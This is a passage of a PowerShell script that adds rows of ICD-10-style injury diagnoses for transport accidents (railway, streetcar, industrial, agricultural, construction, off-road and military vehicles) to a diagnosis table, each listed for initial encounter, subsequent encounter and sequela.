$DiagnosisList.Rows.Add("Animal-rider injured in transport accident with military vehicle","Animal-rider injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in transport accident with military vehicle","Animal-rider injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in transport accident with military vehicle","Animal-rider injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in other transport accident","Animal-rider injured in other transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in other transport accident","Animal-rider injured in other transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in other transport accident","Animal-rider injured in other transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in unspecified transport accident","Animal-rider injured in unspecified transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in unspecified transport accident","Animal-rider injured in unspecified transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Animal-rider injured in unspecified transport accident","Animal-rider injured in unspecified transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in transport accident with military vehicle","Occupant of animal-drawn vehicle injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in transport accident with military vehicle","Occupant of animal-drawn vehicle injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in transport accident with military vehicle","Occupant of animal-drawn vehicle injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in other transport accident","Occupant of animal-drawn vehicle injured in other transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in other transport accident","Occupant of animal-drawn vehicle injured in other transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in other transport accident","Occupant of animal-drawn vehicle injured in other transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in unspecified transport accident","Occupant of animal-drawn vehicle injured in unspecified transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in unspecified transport accident","Occupant of animal-drawn vehicle injured in unspecified transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of animal-drawn vehicle injured in unspecified transport accident","Occupant of animal-drawn vehicle injured in unspecified transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with motor vehicle in nontraffic accident","Occupant of railway train or railway vehicle injured in collision with motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with motor vehicle in nontraffic accident","Occupant of railway train or railway vehicle injured in collision with motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with motor vehicle in nontraffic accident","Occupant of railway train or railway vehicle injured in collision with motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with motor vehicle in traffic accident","Occupant of railway train or railway vehicle injured in collision with motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with motor vehicle in traffic accident","Occupant of railway train or railway vehicle injured in collision with motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with motor vehicle in traffic accident","Occupant of railway train or railway vehicle injured in collision with motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with or hit by rolling stock","Occupant of railway train or railway vehicle injured in collision with or hit by rolling stock, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with or hit by rolling stock","Occupant of railway train or railway vehicle injured in collision with or hit by rolling stock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with or hit by rolling stock","Occupant of railway train or railway vehicle injured in collision with or hit by rolling stock, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with other object","Occupant of railway train or railway vehicle injured in collision with other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with other object","Occupant of railway train or railway vehicle injured in collision with other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in collision with other object","Occupant of railway train or railway vehicle injured in collision with other object, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from railway train or railway vehicle","Person injured while boarding or alighting from railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from railway train or railway vehicle","Person injured while boarding or alighting from railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from railway train or railway vehicle","Person injured while boarding or alighting from railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured by fall in railway train or railway vehicle","Occupant of railway train or railway vehicle injured by fall in railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured by fall in railway train or railway vehicle","Occupant of railway train or railway vehicle injured by fall in railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured by fall in railway train or railway vehicle","Occupant of railway train or railway vehicle injured by fall in railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured by fall from railway train or railway vehicle","Occupant of railway train or railway vehicle injured by fall from railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured by fall from railway train or railway vehicle","Occupant of railway train or railway vehicle injured by fall from railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured by fall from railway train or railway vehicle","Occupant of railway train or railway vehicle injured by fall from railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in derailment without antecedent collision","Occupant of railway train or railway vehicle injured in derailment without antecedent collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in derailment without antecedent collision","Occupant of railway train or railway vehicle injured in derailment without antecedent collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in derailment without antecedent collision","Occupant of railway train or railway vehicle injured in derailment without antecedent collision, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to explosion or fire on train","Occupant of railway train or railway vehicle injured due to explosion or fire on train, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to explosion or fire on train","Occupant of railway train or railway vehicle injured due to explosion or fire on train, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to explosion or fire on train","Occupant of railway train or railway vehicle injured due to explosion or fire on train, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to object falling onto train","Occupant of railway train or railway vehicle injured due to object falling onto train, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to object falling onto train","Occupant of railway train or railway vehicle injured due to object falling onto train, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to object falling onto train","Occupant of railway train or railway vehicle injured due to object falling onto train, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to collision with military vehicle","Occupant of railway train or railway vehicle injured due to collision with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to collision with military vehicle","Occupant of railway train or railway vehicle injured due to collision with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to collision with military vehicle","Occupant of railway train or railway vehicle injured due to collision with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to other specified railway accident","Occupant of railway train or railway vehicle injured due to other specified railway accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to other specified railway accident","Occupant of railway train or railway vehicle injured due to other specified railway accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured due to other specified railway accident","Occupant of railway train or railway vehicle injured due to other specified railway accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in unspecified railway accident","Occupant of railway train or railway vehicle injured in unspecified railway accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in unspecified railway accident","Occupant of railway train or railway vehicle injured in unspecified railway accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of railway train or railway vehicle injured in unspecified railway accident","Occupant of railway train or railway vehicle injured in unspecified railway accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with motor vehicle in nontraffic accident","Occupant of streetcar injured in collision with motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with motor vehicle in nontraffic accident","Occupant of streetcar injured in collision with motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with motor vehicle in nontraffic accident","Occupant of streetcar injured in collision with motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with motor vehicle in traffic accident","Occupant of streetcar injured in collision with motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with motor vehicle in traffic accident","Occupant of streetcar injured in collision with motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with motor vehicle in traffic accident","Occupant of streetcar injured in collision with motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with or hit by rolling stock","Occupant of streetcar injured in collision with or hit by rolling stock, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with or hit by rolling stock","Occupant of streetcar injured in collision with or hit by rolling stock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with or hit by rolling stock","Occupant of streetcar injured in collision with or hit by rolling stock, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with other object","Occupant of streetcar injured in collision with other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with other object","Occupant of streetcar injured in collision with other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in collision with other object","Occupant of streetcar injured in collision with other object, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from streetcar","Person injured while boarding or alighting from streetcar, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from streetcar","Person injured while boarding or alighting from streetcar, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from streetcar","Person injured while boarding or alighting from streetcar, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured by fall in streetcar","Occupant of streetcar injured by fall in streetcar, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured by fall in streetcar","Occupant of streetcar injured by fall in streetcar, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured by fall in streetcar","Occupant of streetcar injured by fall in streetcar, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured by fall from streetcar","Occupant of streetcar injured by fall from streetcar, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured by fall from streetcar","Occupant of streetcar injured by fall from streetcar, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured by fall from streetcar","Occupant of streetcar injured by fall from streetcar, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in derailment without antecedent collision","Occupant of streetcar injured in derailment without antecedent collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in derailment without antecedent collision","Occupant of streetcar injured in derailment without antecedent collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in derailment without antecedent collision","Occupant of streetcar injured in derailment without antecedent collision, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in other specified transport accidents","Occupant of streetcar injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in other specified transport accidents","Occupant of streetcar injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in other specified transport accidents","Occupant of streetcar injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in unspecified traffic accident","Occupant of streetcar injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in unspecified traffic accident","Occupant of streetcar injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of streetcar injured in unspecified traffic accident","Occupant of streetcar injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of special industrial vehicle injured in traffic accident","Driver of special industrial vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of special industrial vehicle injured in traffic accident","Driver of special industrial vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of special industrial vehicle injured in traffic accident","Driver of special industrial vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of special industrial vehicle injured in traffic accident","Passenger of special industrial vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special industrial vehicle injured in traffic accident","Passenger of special industrial vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special industrial vehicle injured in traffic accident","Passenger of special industrial vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of special industrial vehicle injured in traffic accident","Person on outside of special industrial vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special industrial vehicle injured in traffic accident","Person on outside of special industrial vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special industrial vehicle injured in traffic accident","Person on outside of special industrial vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special industrial vehicle injured in traffic accident","Unspecified occupant of special industrial vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special industrial vehicle injured in traffic accident","Unspecified occupant of special industrial vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special industrial vehicle injured in traffic accident","Unspecified occupant of special industrial vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special industrial vehicle","Person injured while boarding or alighting from special industrial vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special industrial vehicle","Person injured while boarding or alighting from special industrial vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special industrial vehicle","Person injured while boarding or alighting from special industrial vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of special industrial vehicle injured in nontraffic accident","Driver of special industrial vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of special industrial vehicle injured in nontraffic accident","Driver of special industrial vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of special industrial vehicle injured in nontraffic accident","Driver of special industrial vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of special industrial vehicle injured in nontraffic accident","Passenger of special industrial vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special industrial vehicle injured in nontraffic accident","Passenger of special industrial vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special industrial vehicle injured in nontraffic accident","Passenger of special industrial vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of special industrial vehicle injured in nontraffic accident","Person on outside of special industrial vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special industrial vehicle injured in nontraffic accident","Person on outside of special industrial vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special industrial vehicle injured in nontraffic accident","Person on outside of special industrial vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special industrial vehicle injured in nontraffic accident","Unspecified occupant of special industrial vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special industrial vehicle injured in nontraffic accident","Unspecified occupant of special industrial vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special industrial vehicle injured in nontraffic accident","Unspecified occupant of special industrial vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of special agricultural vehicle injured in traffic accident","Driver of special agricultural vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of special agricultural vehicle injured in traffic accident","Driver of special agricultural vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of special agricultural vehicle injured in traffic accident","Driver of special agricultural vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of special agricultural vehicle injured in traffic accident","Passenger of special agricultural vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special agricultural vehicle injured in traffic accident","Passenger of special agricultural vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special agricultural vehicle injured in traffic accident","Passenger of special agricultural vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of special agricultural vehicle injured in traffic accident","Person on outside of special agricultural vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special agricultural vehicle injured in traffic accident","Person on outside of special agricultural vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special agricultural vehicle injured in traffic accident","Person on outside of special agricultural vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special agricultural vehicle injured in traffic accident","Unspecified occupant of special agricultural vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special agricultural vehicle injured in traffic accident","Unspecified occupant of special agricultural vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special agricultural vehicle injured in traffic accident","Unspecified occupant of special agricultural vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special agricultural vehicle","Person injured while boarding or alighting from special agricultural vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special agricultural vehicle","Person injured while boarding or alighting from special agricultural vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special agricultural vehicle","Person injured while boarding or alighting from special agricultural vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of special agricultural vehicle injured in nontraffic accident","Driver of special agricultural vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of special agricultural vehicle injured in nontraffic accident","Driver of special agricultural vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of special agricultural vehicle injured in nontraffic accident","Driver of special agricultural vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of special agricultural vehicle injured in nontraffic accident","Passenger of special agricultural vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special agricultural vehicle injured in nontraffic accident","Passenger of special agricultural vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special agricultural vehicle injured in nontraffic accident","Passenger of special agricultural vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of special agricultural vehicle injured in nontraffic accident","Person on outside of special agricultural vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special agricultural vehicle injured in nontraffic accident","Person on outside of special agricultural vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special agricultural vehicle injured in nontraffic accident","Person on outside of special agricultural vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special agricultural vehicle injured in nontraffic accident","Unspecified occupant of special agricultural vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special agricultural vehicle injured in nontraffic accident","Unspecified occupant of special agricultural vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special agricultural vehicle injured in nontraffic accident","Unspecified occupant of special agricultural vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of special construction vehicle injured in traffic accident","Driver of special construction vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of special construction vehicle injured in traffic accident","Driver of special construction vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of special construction vehicle injured in traffic accident","Driver of special construction vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of special construction vehicle injured in traffic accident","Passenger of special construction vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special construction vehicle injured in traffic accident","Passenger of special construction vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special construction vehicle injured in traffic accident","Passenger of special construction vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of special construction vehicle injured in traffic accident","Person on outside of special construction vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special construction vehicle injured in traffic accident","Person on outside of special construction vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special construction vehicle injured in traffic accident","Person on outside of special construction vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special construction vehicle injured in traffic accident","Unspecified occupant of special construction vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special construction vehicle injured in traffic accident","Unspecified occupant of special construction vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special construction vehicle injured in traffic accident","Unspecified occupant of special construction vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special construction vehicle","Person injured while boarding or alighting from special construction vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special construction vehicle","Person injured while boarding or alighting from special construction vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from special construction vehicle","Person injured while boarding or alighting from special construction vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of special construction vehicle injured in nontraffic accident","Driver of special construction vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of special construction vehicle injured in nontraffic accident","Driver of special construction vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of special construction vehicle injured in nontraffic accident","Driver of special construction vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of special construction vehicle injured in nontraffic accident","Passenger of special construction vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special construction vehicle injured in nontraffic accident","Passenger of special construction vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of special construction vehicle injured in nontraffic accident","Passenger of special construction vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of special construction vehicle injured in nontraffic accident","Person on outside of special construction vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special construction vehicle injured in nontraffic accident","Person on outside of special construction vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of special construction vehicle injured in nontraffic accident","Person on outside of special construction vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special construction vehicle injured in nontraffic accident","Unspecified occupant of special construction vehicle injured in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special construction vehicle injured in nontraffic accident","Unspecified occupant of special construction vehicle injured in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of special construction vehicle injured in nontraffic accident","Unspecified occupant of special construction vehicle injured in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of ambulance or fire engine injured in traffic accident","Driver of ambulance or fire engine injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of ambulance or fire engine injured in traffic accident","Driver of ambulance or fire engine injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of ambulance or fire engine injured in traffic accident","Driver of ambulance or fire engine injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of snowmobile injured in traffic accident","Driver of snowmobile injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of snowmobile injured in traffic accident","Driver of snowmobile injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of snowmobile injured in traffic accident","Driver of snowmobile injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of dune buggy injured in traffic accident","Driver of dune buggy injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of dune buggy injured in traffic accident","Driver of dune buggy injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of dune buggy injured in traffic accident","Driver of dune buggy injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of military vehicle injured in traffic accident","Driver of military vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of military vehicle injured in traffic accident","Driver of military vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of military vehicle injured in traffic accident","Driver of military vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident","Driver of 3- or 4- wheeled all-terrain vehicle (ATV) injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of dirt bike or motor/cross bike injured in traffic accident","Driver of dirt bike or motor/cross bike injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of dirt bike or motor/cross bike injured in traffic accident","Driver of dirt bike or motor/cross bike injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of dirt bike or motor/cross bike injured in traffic accident","Driver of dirt bike or motor/cross bike injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of other special all-terrain or other off-road motor vehicle injured in traffic accident","Driver of other special all-terrain or other off-road motor vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of other special all-terrain or other off-road motor vehicle injured in traffic accident","Driver of other special all-terrain or other off-road motor vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of other special all-terrain or other off-road motor vehicle injured in traffic accident","Driver of other special all-terrain or other off-road motor vehicle injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of ambulance or fire engine injured in traffic accident","Passenger of ambulance or fire engine injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of ambulance or fire engine injured in traffic accident","Passenger of ambulance or fire engine injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of ambulance or fire engine injured in traffic accident","Passenger of ambulance or fire engine injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of snowmobile injured in traffic accident","Passenger of snowmobile injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of snowmobile injured in traffic accident","Passenger of snowmobile injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of snowmobile injured in traffic accident","Passenger of snowmobile injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of dune buggy injured in traffic accident","Passenger of dune buggy injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dune buggy injured in traffic accident","Passenger of dune buggy injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of dune buggy injured in traffic accident","Passenger of dune buggy injured in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger of military vehicle injured in traffic accident","Passenger of military vehicle injured in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger of military vehicle injured in traffic accident","Passenger of military vehicle injured in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger of military vehicle injured in traffic accident","Passenger of military vehicle injured in traffic accident, sequela") + $null 